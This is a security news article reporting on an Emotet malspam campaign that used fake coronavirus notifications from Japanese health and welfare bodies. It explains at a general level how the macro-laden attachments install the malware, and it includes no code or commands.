Emotet Gang Attempts to Infect Japanese Targets with the Scare of Coronavirus

  • The emails are disguised to look like its sent on behalf of disability welfare service provider and public health centers.
  • The scam has been observed in various prefectures from Japan, including Gifu, Osaka, and Tottori.

Researchers noted notorious spam email activities camouflaged as official notifications related to coronavirus.

What happened?

A group of researchers reported a malspam campaign disguised as notifications to provide more details on preventive measures against coronavirus infections, which is currently an epidemic in China.

  • The emails are disguised to look like its sent on behalf of disability welfare service provider and public health centers to gain the confidence of the readers.
  • The attackers were, in fact, distributing Emotet payloads via attachments in the emails.
  • The attachments promise to provide preventive measures against coronavirus infections for Japanese citizens.
  • The scam has been observed in various prefectures from Japan, including Gifu, Osaka, and Tottori.

Earlier, the Emotet gang rode on the back on similar trending events where it targeted people using custom holiday for Christmas and Halloween, and used fake invites to a Greta Thunberg Demonstration to lure targets.

How coronavirus spam mail works?

Reports from the infosec community suggest that the malspam campaign used stolen emails (as a template) from previously compromised accounts to attempt and infect the recipients. Some experts indicated that "Japanese in the subject and file names are strange" and that makes the emails look more sophisticated in comparison with other Emotet distribution attempts.

The IBM X-Force Threat Intelligence team noted that, "The subject of the emails, as well as the document filenames, are similar, but not identical... they are composed of different representations of the current date and the Japanese word for 'notification', in order to suggest urgency.”

Some of the email samples also had the address of the institution that supposedly sent the coronavirus infection notification for added authenticity in the footer.

Objectives of Emotet attacks

Usually relying on spam emails, Emotet actors attempt to trick their prospective recipients into opening email attachments, which, when opened, result in the download and installation of the malware.

  • Users normally see the attachment as a standard Emotet malspam Office 365 document template that asks them to "Enable Content" to properly view the full document.
  • Doing this enables the macros feature in Microsoft Office which allows the Emotet payload to get installed on the victim's device using a PowerShell command.
  • Then, the spam messages are made to travel to other systems to drop other malware strains such as the Trickbot trojan, known for delivering ransomware.
  • Ultimately, attackers look to harvest user credentials, browser history, and other critical documents.